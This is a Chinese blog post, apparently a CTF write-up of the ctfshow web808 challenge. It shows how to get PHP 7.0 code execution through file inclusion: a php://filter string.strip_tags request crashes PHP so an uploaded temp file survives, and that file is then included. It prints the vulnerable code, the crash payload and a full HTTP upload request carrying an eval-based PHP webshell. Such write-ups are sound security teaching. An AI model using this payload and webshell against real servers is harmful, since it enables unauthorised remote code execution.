PHP7.0文件包含崩溃卡临时文件

最新推荐文章于 2023-03-04 20:01:09 发布
最新推荐文章于 2023-03-04 20:01:09 发布
阅读量807 收藏 1
点赞数
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62989306/article/details/125114940
版权

​​​​​​​​​​​​​​​​​​​​PHP LFI 利用临时文件 Getshell 姿势 - 安全客,安全资讯平台

使用条件:

  • php7.0版本

  • 有完整的包含点

  • /tmp目录可写

基本原理:

php脚本运行时,会自动给超全局变量赋值。

如果我们向一个 php 脚本发送文件上传表单, php 会将上传的文件存放在一个临时目录,等待 php 脚本处理,脚本运行结束后,无论 php 脚本是否处理这个上传文件,都会删除这个临时上传文件。

php 为什么要这么做呢?其实是为了解决文件上传的问题,由于 php 代码是可以动态执行的, php 解释器是不知道哪个请求有文件上传,哪个请求没有文件上传。如果不接收上传的临时文件,那么脚本里面要使用上传的文件的话,就会找不到。如果每次都上传,那么如果没有处理上传文件的情况下,会造成每次都写临时文件,造成硬盘空间的浪费。所以 php 采用了折中的机制,每次都保留临时文件的内容,但是脚本执行完毕以后,就删除掉,这样既满足了随时调取上传文件内容的需要,又不占用额外的存储空间。

也就是说:虽然我们可以控制上传临时文件的内容,但是脚本运行结束以后就会自动删除掉。

基于这种情况,出现了2种利用方式

  1. 脚本运行结束之前就包含这个临时文件,执行里面的恶意代码,并生成后门,删除临时文件后不影响以后的命令执行,条件竞争就是这个原理。

  2. 脚本运行结束之后不删除这个临时文件。这就是这个议题讨论的情况,想办法让脚本运行结束后不 删除这个临时文件。

于是乎,现在的重点就是解决脚本运行结束之后,不删除这个临时文件。

另外我们知道:

  • 如果php代码中途退出了,就不会删除临时文件

但是例外:

Shutdown函数和析构函数,代码中显示 exit() 或者 die() 以后,仍会执行

例题:

ctfshow-web808

<?php
error_reporting(0);
$file = $_GET['file'];

if(isset($file) && !preg_match("/input|data|phar|log/i",$file)){
    include $file;
}else{
    show_source(__FILE__);
    print_r(scandir("/tmp"));
}

Array ( [0] => . [1] => .. )

有一个文件包含点,先写一个上传表单,直接f12插入网页源代码里:

<html>
    <body>
    <form action="http://3a0a2b8c-93a0-4517-81ca-00ef1c2fd167.challenge.ctf.show/" method="post" enctype="multipart/form-data">
        <lable for="file">Filename:</lable>
        <input type="file" name="file" id="file" />
    	<br />
        <input type="submit" name="submit" value="Submit" />
        </form>
    </body>
</html>

这里使用php7.0线程崩溃payload

?file=php://filter/string.strip_tags/resource=/etc/passwd

php代码中使用php://filter的过滤器strip_tags , 可以让 php 执行的时候直接出现 Segment Fault , 这样 php 的垃圾回收机制就不会在继续执行 , 导致 POST 的文件会保存在系统的缓存目录下不会被清除而不想phpinfo那样上传的文件很快就会被删除,这样的情况下我们只需要知道其文件名就可以包含我们的恶意代码。

然后上传文件

请求包(这里上传的一句话木马的密码是1):

 POST /?file=php://filter/string.strip_tags/resource=/etc/passwd HTTP/1.1
 Host: 3a0a2b8c-93a0-4517-81ca-00ef1c2fd167.challenge.ctf.show
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 Accept-Encoding: gzip, deflate
 Content-Type: multipart/form-data; boundary=---------------------------16511668918698662614261256504
 Content-Length: 374
 Origin: http://3a0a2b8c-93a0-4517-81ca-00ef1c2fd167.challenge.ctf.show
 Connection: close
 Referer: http://3a0a2b8c-93a0-4517-81ca-00ef1c2fd167.challenge.ctf.show/
 Cookie: UM_distinctid=180500f15de581-06dfb1171f6d008-4c3e2c73-144000-180500f15df490
 Upgrade-Insecure-Requests: 1
 ​
 -----------------------------16511668918698662614261256504
 Content-Disposition: form-data; name="file"; filename="hack.php"
 Content-Type: image/jpeg
 ​
 <?php
 echo "ok!";
 @eval($_POST['1']);
 -----------------------------16511668918698662614261256504
 Content-Disposition: form-data; name="submit"
 ​
 Submit
 -----------------------------16511668918698662614261256504--

然后页面刚好会返回临时文件名:

把那个临时文件利用file传参包含进来: 

成功RCE

kikkeve
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Bugku 文件包含2 writeup 绕过过滤
zazazrt的博客
02-18 1709
首先附上网站源码http://123.206.31.85:49166/ index.php &lt;!-- upload.php --&gt; &lt;?php if(!isset($_GET['file'])) { header('Location: ./index.php?file=hello.php'); exit(); } ...
Android7.0 Intent打开文件管理器 获取文件真实路径
03-29
Android7.0 Intent打开文件管理器 获取文件真实路径。虽然网上很多demo,但是没有一个能够兼容所有Android机的,去网上学习了然后自己亲测过手机分别有Android7.0/6.0/4.3个版本。
phpinfo包含临时文件Getshell全过程及源码
记录学习,一起进步
03-04 2747
phpinfo包含临时文件Getshell全过程及源码
文件包含漏洞&认识认识
weixin_54882883的博客
05-25 156
文件包含 概念 什么时候文件包含 那么文件包含呢简单来说就是 你的大哥,你有六个小弟, 那么大哥就有这六个小弟的呼叫方式, 当他要那个小弟的帮助就直接呼叫那个小弟那个小弟就会过滤帮助他了 那么用专业的话来说就是, 有ABCD四个文件 那么A文件里面设置了文件包含的函数 那么当A文件需要B文件的时候,就包含B文件就可以了,当A文件需要C文件就包含C文件就可以了, 可以怎么去简单理解 那么程序员为什么会用到文件包含呢 首先就是一个方便,当A文件需要B文件的时候就直接通过文件包含,包含B文件就可以,直接把B
ctfshow php特性 下
weixin_63231007的博客
06-13 1340
web113 function filter($file){ if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){ die('hacker!'); }else{ return $file; } } $file=$_GET['file']; if(! is_file($file)){ highlight_file(filter($f
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 864
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
单文件制作工具-7.0.0.9
11-16
7.0.0.9版本的更新可能包括性能优化、bug修复以及新增功能,使得用户能更方便地创建自包含的程序。 在IT领域,单文件程序制作是程序员或系统管理员常用的技术。传统的应用程序通常由多个文件组成,包括可执行文件、...
瑞友天翼应用虚拟化系统 V7.0 授权许可证文件
09-22
瑞友天翼应用虚拟化系统 V7.0 的核心功能包括: - **远程桌面服务**:让用户可以通过任何设备,无论其地理位置,安全地访问公司内部的应用程序,提升员工的生产力和灵活性。 - **资源优化**:通过集中管理和分发...
安卓SD文件管理更新信息相关-Android7.0自定义文件管理器获取文件夹路径.rar
07-29
这个压缩包“Android7.0 自定义文件管理器 获取文件夹路径.rar”包含了关于如何在新版本的Android系统上开发自定义文件管理器并获取文件夹路径的相关信息。以下是对这个主题的详细阐述: 1. **Android 7.0的存储...
ctfshow 常用姿势
qq_53063436的博客
11-02 905
ctfshow 常用姿态
[ctfshow web入门]常用姿势807-812
weixin_45751765的博客
04-15 2737
808 811 812
CTFshow--常用姿势
unexpectedthing的博客
07-06 1792
常用姿势
[BJDCTF2020]EzPHP之preg_match绕过
weixin_42478365的博客
08-21 4181
打开链接之后发现页面为: 右击查看不了源码,按F12查看源码得到 GFXEIM3YFZYGQ4A= 使用base64,base32与base16一个一个试,得知是base32,解密之后为:1nD3x.php,之后在url上输入查看得到代码: <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $
preg_match检查URL地址是否合法
qq_50673174的博客
07-31 428
preg_match检查URL地址是否合法
CTF 总结02:preg_match()绕过
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
CTF——Web——文件包含漏洞
热门推荐
小锤队长的博客
08-19 1万+
转载于 信安之路 :https://cloud.tencent.com/developer/article/1180857 文件包含原理: 原理 文件包含漏洞的产生原因是在通过 PHP 的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。 php 中引发文件包含漏洞的通常是以下四个函数: 1、include() 当...
[GXYCTF2019]禁止套娃
qq_61209261的博客
07-29 140
无参rce git泄露
2021-03-01
m0_53314778的博客
03-01 280
[BJDCTF 2nd]elementmaster 启动: 看到两个hidden id 第一个明显是十六进制,然后就把两个都转换一下,拼起来得到Po.php, 访问Po.php,发现只有一个点。翻译index.php(首页)的英文。 我是全部118个元素的元素大师!你可能没有感觉,但是放射性射线的症状会无声的杀死你。 加上这个题的题目 element master,就是元素掌控者的意思, 结合步骤一(Po也是个化学元素的缩写),感觉应该是访问由元素周期表命名的php文件 (说白就是:.php文件是以元素周期
rhel7.0镜像文件下载
最新发布
10-18
RHEL(Red Hat Enterprise Linux)是一种商业化的Linux发行版,由Red Hat公司开发。RHEL 7.0是RHEL 7系列的第一个版本,于2014年6月发布。如果您想下载RHEL 7.0镜像文件,可以按照以下步骤进行操作: 1. 首先,您需要注册一个Red Hat账户。如果您还没有账户,可以在Red Hat官网上注册一个。 2. 登录Red Hat官网后,访问以下链接:https://access.redhat.com/downloads/content/69/ver=/rhel---7/7.0/x86_64/product-software 3. 在该页面中,您可以找到RHEL 7.0的各种镜像文件,包括DVD ISO、Boot ISO、Minimal ISO等。选择您需要的镜像文件并下载即可。 请注意,

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kikkeve

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值